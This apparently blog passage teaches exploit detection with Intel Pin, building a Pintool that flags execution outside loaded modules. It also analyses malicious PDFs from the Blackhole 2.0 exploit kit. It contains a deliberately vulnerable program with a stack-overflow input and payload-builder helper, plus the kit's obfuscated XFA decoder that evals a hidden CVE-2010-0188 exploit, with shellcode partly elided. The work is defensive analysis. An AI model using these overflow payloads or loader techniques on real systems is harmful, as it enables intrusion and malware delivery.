  • "PIN_AddThreadStartFunction()" and "PIN_AddThreadFiniFunction()" to handle thread creation and ending.

In particular, if you register a callback with "INS_AddInstrumentFunction()", you can then use the "INS_InsertCall()" function from it and register other callbacks.
These callbacks have a special property: they can be invoked before or after an instruction is executed. Also, you can pass to them any kind of data, including the value of specific registers (the instruction pointer, for instance), memory addresses and so on.

Finally, you'll have to use "PIN_AddFiniFunction()" to register the callback that is invoked when the application quits.

Once all the callbacks are registered, you can start the instrumented program by calling "PIN_StartProgram()".

Your Pintool can filter specific conditions with very fine granularity, but bear in mind that performance may degrade badly depending on the actions you choose to perform.

As an example, let's consider "INS_AddInstrumentFunction()" again, and suppose that we are going to register a callback that logs every executed instruction to a file: if you are not careful, you might generate file I/O for every single instruction, which is very inefficient. Another operation that will reduce your Pintool's performance, if called frequently, is the disassembler functionality.
So be careful: your instrumented application can run almost at real-time speed if your Pintool is well written, but a bad implementation may slow it down to the point where it takes minutes to run.
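One common way to keep the logging cost down is to collect the addresses in memory and format them in batches. The sketch below is independent of Pin and only shows the idea: BatchedTrace and format_trace are hypothetical names, and it writes to a std::ostream rather than to the FILE* used by the Pintool.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <ostream>
#include <sstream>
#include <string>
#include <vector>

// Collects addresses in memory and writes them out capacity entries at a time.
class BatchedTrace {
public:
    BatchedTrace(std::ostream& out, std::size_t capacity)
        : out_(out), capacity_(capacity), flushes_(0) {
        assert(capacity > 0);
        pending_.reserve(capacity);
    }

    // Cheap per-instruction work: just remember the address.
    void record(std::uint32_t address) {
        pending_.push_back(address);
        if (pending_.size() >= capacity_) flush();
    }

    // Expensive work (formatting and output), done once per batch.
    void flush() {
        if (pending_.empty()) return;
        char line[16];
        for (std::uint32_t address : pending_) {
            int length = std::snprintf(line, sizeof line, "%08x\n",
                                       static_cast<unsigned>(address));
            out_.write(line, length);
        }
        pending_.clear();
        ++flushes_;
    }

    std::size_t flushes() const { return flushes_; }

private:
    std::ostream& out_;
    std::size_t capacity_;
    std::size_t flushes_;
    std::vector<std::uint32_t> pending_;
};

// Convenience helper: trace a list of addresses into a string.
std::string format_trace(const std::vector<std::uint32_t>& addresses, std::size_t capacity) {
    std::ostringstream sink;
    BatchedTrace trace(sink, capacity);
    for (std::uint32_t address : addresses) trace.record(address);
    trace.flush();   // do not lose the last, partially filled batch
    return sink.str();
}
```

In a Pintool, the natural place for the final flush() would be the callback registered with "PIN_AddFiniFunction()"; keep in mind that a crash of the instrumented process loses whatever is still in the buffer, so the batch size is a trade-off between speed and how much of the trace you can afford to lose.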


A basic Pintool.

Here is a very basic Pintool to which we will add more specific functions later.

 #include <stdio.h>  
 #include "pin.H"   
   
 namespace WINDOWS  
 {  
     #include <windows.h>  
 }  
   
 FILE * OutTrace;  
 ADDRINT ExceptionDispatcher = 0;
   
 /* ===================================================================== */  
 /* Instrumentation functions                                             */  
 /* ===================================================================== */  
   
 VOID DetectEip(ADDRINT AddrEip, ...)   
 {  
     if(AddrEip == ExceptionDispatcher)  
     {  
         fprintf(OutTrace, "%08x Exception occurred!\n", AddrEip);   
     } 

     // Here you can call the functions that we will add
     //(you should also remove the next line to avoid tracing every instruction being executed)
   
     fprintf(OutTrace, "%08x \n", AddrEip);  
 }  
   
 // Pin calls this function every time a new instruction is encountered  
 VOID Instruction(INS Ins, VOID *v)  
 {  
     // Insert a call to DetectEip before every instruction, and pass it the IP  
     INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectEip, IARG_INST_PTR, IARG_END);  
 }  
   
 VOID ImageLoad(IMG Img, VOID *v)  
 {  
     fprintf(OutTrace, "Loading module %s \n", IMG_Name(Img).c_str());  
     fprintf(OutTrace, "Module Base: %08x \n", IMG_LowAddress(Img));  
     fprintf(OutTrace, "Module end: %08x \n", IMG_HighAddress(Img));  
     fflush(OutTrace);  
 }  
   
 /* ===================================================================== */  
 /* Finalization function                                                 */  
 /* ===================================================================== */  
   
 // This function is called when the application exits  
 VOID Fini(INT32 code, VOID *v)  
 {  
     fprintf(OutTrace, "Terminating execution\n");  
     fflush(OutTrace);  
     fclose(OutTrace);  
 }  
   
 /* ===================================================================== */  
 /* Print Help Message                                                    */  
 /* ===================================================================== */  
   
 INT32 Usage()  
 {  
     PIN_ERROR("Init error\n");  
     return -1;  
 }  
   
 /* ===================================================================== */  
 /* Main                                                                  */  
 /* ===================================================================== */  
   
 int main(int argc, char * argv[])  
 {  
     OutTrace = fopen("itrace.txt", "wb");  
   
     WINDOWS::HMODULE hNtdll;  
     hNtdll = WINDOWS::LoadLibrary("ntdll");  
     ExceptionDispatcher = (ADDRINT)WINDOWS::GetProcAddress(hNtdll, "KiUserExceptionDispatcher");  
     fprintf(OutTrace, "Exception handler address: %08x \n", ExceptionDispatcher);  
     WINDOWS::FreeLibrary(hNtdll);  
   
     // Initialize pin  
     // Initialize pin; bail out if the command line could not be parsed  
     if (PIN_Init(argc, argv))   
     {  
         return Usage();  
     }  
   
     // Register Instruction to be called to instrument instructions  
     INS_AddInstrumentFunction(Instruction, 0);  
   
     // Register ImageLoad to be called at every module load  
     IMG_AddInstrumentFunction(ImageLoad, 0);  
   
     // Register Fini to be called when the application exits  
     PIN_AddFiniFunction(Fini, 0);  
     
     // Start the program, never returns  
     fprintf(OutTrace, "Starting Pintool\n");   
     PIN_StartProgram();  
   
     return 0;  
 }    

It basically logs to a file: the address of each instruction being executed; all the exceptions that occurred; the name of each module being loaded, including its base and end addresses.

I have also put a comment in the "DetectEip()" function, to specify where you can call the functions we will add later.


First exploit scenario: stack overflow.

As a first case study, we are going to consider a specially crafted sample:

 #include <stdio.h>  
 #include <string.h>  
   
 unsigned char Var[2] = {0xFF, 0xE4};  
   
 void GetPassword(){  
  char Password[12];  
   
  memset(Password, 0, sizeof(Password));  
  printf("Insert your password (max 12 chars):\n");  
   
  int i = -1;  
  do{  
    i++;  
    Password[i] = getchar();  
  } while (Password[i] != 0x0D && Password[i] != 0x0A);  
  Password[i] = 0;  
   
  printf("Your password is: %s \n", Password);  
 }  
   
 void main(void){  
  GetPassword();  
 }  

Before compiling and linking it (I used Visual Studio 10), be sure to disable all the security options (stack canaries, DEP, ASLR) and to set the Base Address to 0x41410000.
I know it might sound a little unrealistic, and in fact... it is! But don't worry: as I said before, this is just the simplest example that crossed my mind, and we are going to use it as a first test. The methodology I'm proposing is nonetheless very effective, and we will see a real case study later.

First, we need to "exploit" this little test: I'll be quick. We can open the executable with OllyDbg and debug it until we reach the "getchar" function, which reads the input string. Then we enter the following (in my case at least; check the parameters explained below if you want to be 100% sure!): "123456789abcAAAA 0AABBBBBBBBBBBBBBBBBBB" (without the quotes).

What does it mean? We fill all the 12 bytes of the buffer and, because the size of the input is never checked, we also type:

  • "AAAA", which covers the padding added by the compiler;
  • " 0AA", which corresponds to the address 0x41413020 (= "AA0 " read backwards, because of the little-endian byte order) where the "JMP ESP" instruction (opcode "0xFF 0xE4") is located; this overwrites the return address of the "main" function;
  • a bunch of "B", each corresponding to an "INC EDX" instruction; this is where you would usually put the shellcode, but for a test any valid instruction will do!
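
The layout of the input can also be expressed in code. The sketch below rebuilds the test string from its parts; "BuildTestInput" and its parameter names are made up for illustration, and the padding and target address are the values used in this article, so they may well differ in your build.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>

// Hypothetical helper: assembles the overflow string from its components.
std::string BuildTestInput(const std::string& filler,      // fills the 12-byte buffer
                           const std::string& padding,     // compiler padding
                           std::uint32_t jmpEspAddr,       // address of "JMP ESP"
                           std::size_t fillerInstructions) // number of "INC EDX"
{
    std::string input = filler + padding;

    // x86 is little-endian: the least significant byte goes first.
    for (int shift = 0; shift < 32; shift += 8)
    {
        input.push_back(static_cast<char>((jmpEspAddr >> shift) & 0xFF));
    }

    // 'B' is 0x42, the opcode of INC EDX; it stands in for the shellcode.
    input.append(fillerInstructions, 'B');
    return input;
}
```

For instance, BuildTestInput("123456789abc", "AAAA", 0x41413020, 4) yields "123456789abcAAAA 0AABBBB". Keep in mind that the sample stops reading at 0x0D or 0x0A, so no byte of the string (address included) can have one of those values.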

Now that you have verified that the string I provided also works in your case, or you have built your own valid string, we are ready to analyze our first exploit scenario: a simple stack overflow. How can we detect it?
The most natural idea is to check EIP to see whether its value falls in an area that is not supposed to contain code (the stack in this case).

The Pintool maintains two variables containing the base and end address of the module being executed.
If the value of EIP isn't in the range delimited by these two addresses, the Pintool walks the module list maintained by Pin, looking for the executable module in which the value of EIP resides (for instance, after an API call). When such a module is found, the two variables are updated (making it the current module).
If the value of EIP isn't located within any of the modules, the Pintool reports it as suspicious and logs the last 1000 executed values of EIP.

Here is the code to do that:

 #define LAST_EXECUTED 1000  
 ADDRINT LastExecutedBuf[LAST_EXECUTED];  
 UINT32 LastExecutedPos;
 ADDRINT CurrentModuleBase, CurrentModuleEnd;  
   
 bool IsModuleFound(ADDRINT Addr)  
 {  
     for(IMG Img = APP_ImgHead(); IMG_Valid(Img); Img = IMG_Next(Img))  
     {  
         if(Addr >= IMG_LowAddress(Img) &&  
             Addr <= IMG_HighAddress(Img))    // <=, not <  
         {  
             CurrentModuleBase = IMG_LowAddress(Img);  
             CurrentModuleEnd = IMG_HighAddress(Img);  
             return true;  
         }  
     }  
   
     return false;  
 }  
   
 void CheckEipModule(ADDRINT AddrEip)  
 {  
     UINT32 i;  
     // IMG_HighAddress is inclusive, so use <= here as in IsModuleFound  
     if(! (AddrEip >= CurrentModuleBase && AddrEip <= CurrentModuleEnd) )  
     {  
         if(!IsModuleFound(AddrEip))  
         {  
             // eip is not within an executable image!  
             fprintf(OutTrace, "EIP detected not within an executable module: %08x \n", AddrEip);  
             fprintf(OutTrace,"Dumping list of previously executed EIPs \n");  
             for(i = LastExecutedPos; i < LAST_EXECUTED; i++)  
             {  
                 fprintf(OutTrace, "%08x \n", LastExecutedBuf[i]);   
             }  
             for(i = 0; i < LastExecutedPos; i++)  
             {  
                 fprintf(OutTrace, "%08x \n", LastExecutedBuf[i]);   
             }  
             fprintf(OutTrace, "%08x \n --- END ---", AddrEip);   
             fflush(OutTrace);  
             WINDOWS::ExitProcess(0);  
         }  
     }  
   
     LastExecutedBuf[LastExecutedPos] = AddrEip;  
     LastExecutedPos++;  
     if(LastExecutedPos >= LAST_EXECUTED)  
     {  
         // circular logging  
         LastExecutedPos = 0;  
     }  
 }  

You can simply copy it into the basic Pintool provided above, but remember to also add the line:

CheckEipModule(AddrEip);

in the "DetectEip()" function (where specified by the comment).

Compile/link the Pintool and execute it.

Once executed, it will generate a log (I've cut some lines!) like the following:

Exception handler address: 7c91eaec 
Starting Pintool
Loading module C:\...\StackBof.exe 
Module Base: 41410000 
Module end: 41414fff 
Loading module C:\WINDOWS\system32\kernel32.dll 
Module Base: 7c800000 
Module end: 7c8fefff 
Loading module C:\WINDOWS\system32\ntdll.dll 
Module Base: 7c910000 
Module end: 7c9c5fff 
Loading module C:\WINDOWS\system32\MSVCR100.dll 
Module Base: 78aa0000 
Module end: 78b5dfff 
EIP detected not within an executable module: 0012ff84 
Dumping list of previously executed EIPs 
78ac005f 
78ac0061 
78ac0062 
78ac0063 
78ac0069 
...
78ab0cd7 
78ab0cd8 
78b05747 
4141104f 
41411052 
41411053 
41411054 
41411056 
41411057 
41411059 
4141105a 
41413020 
0012ff84 
 --- END ---

It's easy to understand what happened just by reading the log:

  • the RET instruction is located at the address "0x4141105A";
  • it jumps to the overwritten return address, "0x41413020", where a "JMP ESP" is located;
  • the Pintool successfully detects that we are trying to execute code outside any executable module (at the address "0x0012FF84", which belongs to the stack).


Conclusions

This was an introductory article on binary instrumentation for exploit analysis, and I really hope you liked it! See you in a few days for the second part, where I will discuss another scenario: a real PDF exploit that makes use of ROP and heap spraying.

Thursday, October 11, 2012

Some notes about the pdf exploits in Blackhole 2.0

Recently we have been hearing a lot about Blackhole 2.0, the latest edition of the popular exploit kit, so I started looking around to gather some more information. In particular, I searched for some websites hosting it and found a PDF file that caught my attention (you can find it at <blackhole_host>/data/t.pdf).

The curious thing about it is that it doesn't contain any malicious code; if we look closer, we see that it's only a sort of skeleton for the real malicious PDF.

In fact, just by looking at the raw bytes we see the following objects:

3 0 obj<<%data%/CreationDate(%title%)>>
endobj

42 0 obj<</Length 504/Filter[/FlateDecode]/Type/EmbeddedFile>>stream
%config%
endstream
endobj

43 0 obj<</Length 1313/Filter/FlateDecode/Type/EmbeddedFile>>stream
%js%
endstream
endobj


This suggests that the malicious PDF is probably built at runtime: it seems that the fields %data%, %title%, %config% and %js% are filled each time with data related to a different exploit, depending on the vulnerability found on the victim's system. This is also a novelty for the Blackhole exploit kit, as the previous versions didn't use a similar approach.

So I investigated further: I searched for some live exploit URLs in order to perform a real infection and capture the traffic with Wireshark. I then extracted the PDF file from the capture and started analyzing it.

To do that I used a utility named PDFStreamDumper, which successfully decompresses the streams (note that some alternatives, such as pdftk, failed at this, perhaps because the file was intentionally corrupted to make inspection more difficult).

The important streams are the same as the ones listed above, but in this case they are filled with data (they are shown in a slightly different notation because I had to decompress them). Here they are, together with a brief explanation:

3

<<
/Keywords(3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21)/CreationDate(6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5… **SHELLCODE BYTES** ...6363636d7477723d3033303333333034333430383335333830393035266c71786d746e66623d30332668657a6e647865663d746c796d6626717666707870656f3d75777462730000)
>>

This stream contains both the encrypted JavaScript exploit (in the "Keywords" field) and the shellcode (in the "CreationDate" field).


42

<config xmlns="http://www.xfa.org/schema/xci/1.0/" xmlns:xfa="http://www.xfa.org/schema/xci/1.0/"><trace><area level="1" name="font"></area></trace><agent name="designer"><!--  [0..n]  --><destination>pdf</destination><pdf><!--  [0..n]  --><fontInfo></fontInfo></pdf></agent><present><!--  [0..n]  --><pdf><!--  [0..n]  --><fontInfo><embed>1</embed></fontInfo><version>1.6</version><creator>Adobe Designer 7.0</creator><producer>Adobe Designer 7.0</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present><acrobat><acrobat7><dynamicRender>forbidden</dynamicRender></acrobat7><common><locale></locale><data><incrementalLoad></incrementalLoad><adjustData></adjustData><xsl><uri></uri></xsl><outputXSL><uri></uri></outputXSL></data><template><base>C:\</base><relevant></relevant><uri></uri></template></common></acrobat></config>

This stream contains some XML data (an XFA configuration).


43

<!--&lt;template>--><template><subform layout="tb" locale="ru_RU" name="form1"><pageSet><pageArea id="Page1" name="Page1"><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption><border xmlns="http://www.xfa.org/schema/xfa-template/2.2/"><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border><event xmlns:xfa="http://www.xfa.org/schema/xfa-template/2.2/" activity="initialize">
<xfa:script contentType='application/x-javascript'>
with(event){
k=target[/**/"eval"];
if((app.addMenuItem+/**/"").indexOf(/**/'native')!=-1){a=/**/target.keywords;}
}
s="";
z=a;
/**/ss/**/=/**/String.fromCharCode/**/;
for(i=0;i&lt;a.length;i+=2){
s=s.concat(ss(parseInt(z[i]+z[1+i],0x1d)));
}
k(s);
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>

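This stream contains the script that decrypts the exploit: it reads the "Keywords" field, converts each pair of characters into a character code by interpreting it as a number in base 0x1D (29), and passes the resulting string to "eval".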


To decrypt the exploit, you can use the following HTML page ("z" contains the encrypted bytes):

<html>

<head>
<title>Decrypted Exploit</title>
</head>

<body>
<script language="javascript">

var z;
var s;
z = "3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21";
s = "";
for(i=0; i < z.length; i+=2)
{
  document.write(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)));
  if(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)) == ';' )
     document.write("<br/>");
}

</script>
</body>

</html>


The decrypted script turns out to be an exploit for the following well-known vulnerability (CVE-2010-0188):

*REMOVED*
  _j8='SUkqADggAABB'; // * base64 representation of a TIFF header! *
   _j9=_I2('QUFB',10984);
   _ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
   _ll1=_j8+_j9+_ll0+_j5;
   _ll2=_ji1(_j7,'');
   if(_ll2.length%2)_ll2+=unescape('');
   _ll3=_j2(_ll2);
   with(
   {
     k:_ll3
   }
   )_I0(k);
   ImageField1.rawValue=_ll1
*REMOVED*


I also gathered some other malicious PDF files and found that they are always structured in the same way: the decryption script may change a little (for example, I found "0x1C" instead of "0x1D" as the numerical base used to interpret the bytes), but the method itself is very similar.
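
Since only the base changes between samples, the decoding step can be written once with the base as a parameter. Here is a minimal C++ sketch of it, assuming every character is encoded as exactly two digits; "DecodePairs" and "DigitValue" are hypothetical names, and unlike JavaScript's parseInt (which stops at the first invalid character) this version throws on a digit that is not valid in the given base.

```cpp
#include <cctype>
#include <cstddef>
#include <stdexcept>
#include <string>

// Value of one digit for bases up to 36 ('0'-'9', then 'a'-'z'), or -1.
static int DigitValue(char c)
{
    unsigned char u = static_cast<unsigned char>(c);
    if (std::isdigit(u)) return u - '0';
    if (std::isalpha(u)) return std::tolower(u) - 'a' + 10;
    return -1;
}

// Hypothetical helper: turns each pair of base-N digits into one character.
std::string DecodePairs(const std::string& encoded, int base)
{
    if (base < 2 || base > 36)
    {
        throw std::invalid_argument("unsupported base");
    }

    std::string decoded;
    for (std::size_t i = 0; i + 1 < encoded.size(); i += 2)
    {
        int hi = DigitValue(encoded[i]);
        int lo = DigitValue(encoded[i + 1]);
        if (hi < 0 || hi >= base || lo < 0 || lo >= base)
        {
            throw std::invalid_argument("digit out of range for base");
        }
        // Values above 255 are truncated here; the samples only use ASCII.
        decoded.push_back(static_cast<char>(hi * base + lo));
    }
    return decoded;
}
```

With the first characters of the "Keywords" field shown above, DecodePairs("3a3p3p1h3a3l3e3r40", 0x1D) returns "app.alert". For a sample that uses the other base, you would pass 0x1C instead.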